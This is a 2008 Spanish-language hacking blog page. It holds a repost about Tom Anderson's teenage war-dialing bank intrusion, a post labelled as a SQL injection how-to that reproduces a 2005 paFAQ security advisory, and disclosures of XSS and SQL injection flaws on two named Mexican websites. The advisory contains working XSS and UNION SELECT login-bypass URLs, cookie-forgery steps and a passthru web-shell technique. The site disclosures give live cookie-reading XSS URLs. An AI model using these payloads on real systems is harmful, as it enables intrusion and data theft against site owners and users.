Claro que su fama actual no tiene nada que ver con la que tenía en la década de los 80’s, donde era un personaje que se encontraba en la mira del FBI por sus actividades extraprogramáticas.

Por allá por el año 1985 Anderson tenía sólo 14 años, pero igual se las ingenió para intervenir los sistemas informáticos del Chase Manhattan Bank. Como fue descubierto y ante la imposibilidad de ser detenido por su corta edad, el FBI le confiscó todos sus equipos, le amarró las manos y le dijo a su mamá: “Este niñito requiere un sicólogo” (en verdad lo último lo inventé).

El método utilizado por “Mr. Anderson” consistía en utilizar números telefónicos legítimos para realizar las intervenciones a los sistemas, un método que se conoce como “war-dialing”.

El programa que utilizaba era muy sencillo, lo que hacía era digitar números telefónicos al azar hasta que uno de ellos obtenía respuesta de un módem.

La intervención del banco consistió en cambiar las contraseñas del sistema, con el objeto que los técnicos no pudieran ingresar al mismo.

Tal vez los hermanos Wachowski se inspiraron en él para crear el personaje de Keanu Reeves.

Link: MySpace Cofounder Tom Anderson Was A Real Life “WarGames” Hacker in 1980s (TechCrunch)

Obtenido de: fayerwayer.com

miércoles, 3 de septiembre de 2008

martes, 12 de agosto de 2008

Como usar SQL INYECTION - Inyeccion SQL

A continuación muestro un ejemplo muy sencillo de entender con respecto al funcionamiento de un ataque SQL Inyection.


##########################################################
# GulfTech Security Research June 20th, 2005
##########################################################
# Vendor : php Arena
# URL : http://www.phparena.net/pafaq.php
# Version : paFAQ 1.0 Beta 4
# Risk : Multiple Vulnerabilities
##########################################################

Description:
paFAQ is a FAQ/Knowledge base system that allows webmasters to
keep an organized database of Frequently Asked Questions; a
Knowledge Database for problems and solutions. There are a number
of vulnerabilities in paFaq. These vulnerabilities include
arbitrary unauthorized access to the entire paFaq database, as
well as admin authentication bypass, sql injection, arbitrary
code execution and cross site scripting. An attacker can gain a
remote shell on a vulnerable system using these vulnerabilities.

Cross Site Scripting:
There are some cross site scripting issues in the paFaq software.
Majority of these cross site scripting issues stem from inputted
variables never being sanitized properly.

http:///pafaq/index.php?act=Question&id=1%3E%3Cscript%3Ealert%28
document.cookie%29%3C%2Fscript%3E

These vulnerabilities can be used to render hostile code in the
context of the victims browser, and in turn disclose sensitive
information to an attacker.

SQL Injection:
There are a number of SQL Injection vulnerabilities in paFaq,
but it should be noted that to exploit these issues magic quotes
gpc must be off. Also, magic quotes off seems to be the default
php.ini settings now so I do consider these issues fairly high
risk. The most serious of the SQL Injection issues lies in the
administrative login.

$username = $_REQUEST['username'];
$password = md5($_REQUEST['password']);

$q = $DB->query("SELECT * FROM " . $DB->obj['tbl_pre'] . "admins WHERE
name = '" . $username . "'");
$r = $DB->fetch_row($q);

if ($r['password'] == $password) {

$t = time();
$DB->query("UPDATE " . $DB->obj['tbl_pre'] . "admins SET
session='$t' WHERE id='".$r['id']."'");
setcookie("pafaq_user", $username, time()+3600);
setcookie("pafaq_pass", $password, time()+3600);

The variable $username is taken directly from the submitted login form
and executed in the query, so if magic quotes gpc is off an attacker can
use UNION SELECT to bypass admin authentication!

http://pafaq/admin/index.php?act=login&username='%20UNION%20SELECT%20id,
name,
'3858f62230ac3c915f300c664312c63f',email,notify,permissions,session%20FR
OM%20
pafaq_admins%20WHERE%201/*&password=foobar

The query above uses a UNION SELECT to get the admin username, id, email etc
but we specify the password hash as the md5 encrypted value of the $password
variable. If the host is vulnerable then the above link will log an attacker
in as the first admin in the selected table. Additionally the "id" parameter
in most of the scripts are vulnerable to SQL Injection, and can be
exploited
when magic quotes gpc is set to off.

Arbitrary Database Download:
A very dangerous vulnerability lies in paFaq that will allow for an attacker
to download the entire paFaq database. A user does not have to be logged in
to exploit this vulnerability either, thus making it that more dangerous.

http://path/to/pafaq/admin/backup.php

An attacker can then use the encrypted password hash to gain administrative
access, there is no need for an attacker to decrypt it.

Cookie: pafaq_user=USERNAMEHERE; pafaq_pass=PASSWORDHASH

By adding the above cookie with the required values taken from the
downloaded
database an attacker now has admin access to the affected paFaq
installation.

Arbitrary Code Execution:
Once an attacker has administrative access to the website he can execute any
arbitrary php code by taking advantage of the upload a language pack
feature.
The script does check for a "valid" language pack, but if an attacker, for
example, takes the default en.php file in the language directory and adds a
simple passthru($_GET['cmd']) at the bottom of the page, and then
uploads the
modified en.php after renaming it to something like pafaq.php as a new
language
pack, will be able to execute shell commands on the affected webserver
by calling
the malicious script in the /lang/ directory. Example
/lang/pafaq.php?cmd=id;pwd

Solution:
The developers were contacted and never responded. A quick workaround
would be
to delete the backup.php script, and turn magic quotes gpc on, or better
yet
use a more secure application if deployed live on the web.

Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00083-06202005

Credits:
James Bercegay of the GulfTech Security Research Team

domingo, 10 de agosto de 2008

Vulnerabilidad XSS y SQL Inyection en tyr.com.mx


Se han detectado graves problemas de seguridad en el sitio: http://secure.tyr.com.mx
Vulnerabilidad XSS, SQL Inyection, listado de directorios, listado de usuarios y datos privados.

http://secure.tyr.com.mx/htdocs/vhost40/vhostResultados.php?evento=%3Cscript%3Ealert(%27alerta%27);%3C/script%3E

La variable evento no procesa correctamente los datos de entrada. Se puede generar una cadena SQL especialmente diseñada para obtener los datos directamente de la base de datos.
Tampoco se valida XSS, por lo tanto también es propensa a dichos ataques.

sábado, 9 de agosto de 2008

Vulnerabilidad XSS en ciad.edu.mx



XSS en ciad.edu.mx












Hola a todos, se ha detectado una vulnerabilidad del tipo XSS en el sitio http://www.ciad.edu.mx en la funcion de búsqueda. Al momento de procesar la variable myquery no se están validando correctamente los datos, lo que puede ocasionar un ataque de XSS dentro del sitio. Se recomienda validar el procesamiento de dicha variable para evitar ataques Cross Site Scripting en el sitio.

Ejemplo de XSS en la variable myquery:
http://www.ciad.edu.mx/salima/search.asp?func=search&tree=539&myquery=%3Cscript%3Ealert(document.cookie);%3C/script%3E&submit=Buscar

Ya se ha dado aviso de esta vulnerabilidad a los administradores del sitio.

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)